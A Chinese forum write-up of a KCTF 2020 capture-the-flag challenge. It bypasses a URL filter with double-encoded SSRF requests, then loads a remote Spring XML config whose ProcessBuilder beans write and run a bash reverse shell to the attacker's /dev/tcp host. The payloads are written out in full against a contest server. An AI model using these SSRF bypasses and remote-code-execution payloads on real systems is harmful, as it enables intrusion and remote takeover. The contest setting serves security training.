首页
论坛
课程
招聘
[原创]KCTF2020-秋季赛 第一题至暗时刻 WP
2020-11-18 00:35 1090

[原创]KCTF2020-秋季赛 第一题至暗时刻 WP

2020-11-18 00:35
1090

通过

1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1

发现其存在过滤规则

1
^(http|https):\\/\\/[^?#\\/]*\\.pediy\\.com\\/.*

考虑存在ssrf
拜读了一下作者的浅谈URL
简单测试了一下

1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1:80xx.pediy.com/flag

图片描述
发现其报接口错误 而httpclient4没有这种报错
推测为httpclient3
使用httpclient3进行绕过
payload:

1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/flag

图片描述
发现成功绕过了这个过滤
再者,尝试注释中的loadconfig接口进行加载
图片描述
payload如下:

1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=x.xml

插入代码

 

图片描述
发现了一堆报错 不过没有关系 我们参考一下weblogic中的关于spring framwork的利用
并且在服务器端开了一个Python的服务器然后将xml挂在上面
payload:

1
http://121.36.145.157:8088/getimage?url=http://127.0.0.1%253a8088%253f.pediy.com/loadConfig?url=http://xxxx.xxxxx.xxxxx:8080/x.xml

同时监听端口 发现了get请求
证明可以出网 也可以进行利用

 

对payload进行构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:context="http://www.springframework.org/schema/context"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
      http://www.springframework.org/schema/beans/spring-beans.xsd
      http://www.springframework.org/schema/context
      http://www.springframework.org/schema/context/spring-context.xsd">
 
    <!--    <bean id="est" class="fastjsonapplication.r00t4dm.est" init-method="estInit"/>-->
 
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
                <value><![CDATA[/bin/bash]]></value>
                <value><![CDATA[-c]]></value>
                <value><![CDATA[echo "bash -i >& /dev/tcp/{服务器IP}/{端口} 0>&1" > /tmp/shell.sh ]]></value>
            </list>
       </constructor-arg>
    </bean>
</beans>

这是写shell文件的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xmlns:context="http://www.springframework.org/schema/context"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
      http://www.springframework.org/schema/beans/spring-beans.xsd
      http://www.springframework.org/schema/context
      http://www.springframework.org/schema/context/spring-context.xsd">
 
    <!--    <bean id="est" class="fastjsonapplication.r00t4dm.est" init-method="estInit"/>-->
 
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
        <list>
                <value><![CDATA[/bin/bash]]></value>
                <value><![CDATA[-c]]></value>
                <value><![CDATA[/bin/bash /tmp/shell.sh ]]></value>
            </list>
       </constructor-arg>
    </bean>
</beans>

这是执行文件的payload

 

分别执行 服务器设置监听端口 shell反弹回来

 

按照惯例先ls一下
图片描述

 

home 下的看看

 

图片描述

 

发现了jar文件 通过cat下载

 

下载下来拖进jd-gui中反编译

 

图片描述

 

得到flag:
flag{congratulations-Path-the-spring-boot}

 

部分源码:
图片描述
图片描述


[公告]名企招聘!

最后于 2020-11-18 12:11 被CrazymanArmy编辑 ,原因:
收藏
点赞3
打赏
分享
最新回复 (2)
雪    币: 642
活跃值: 活跃值 (2243)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
supperlitt 活跃值 2020-11-19 14:46
2
0
666
雪    币: 160
活跃值: 活跃值 (1096)
能力值: ( LV9,RANK:176 )
在线值:
发帖
回帖
粉丝
nevinhappy 活跃值 2 2020-11-19 14:55
3
0
666
游客
登录 | 注册 方可回帖
返回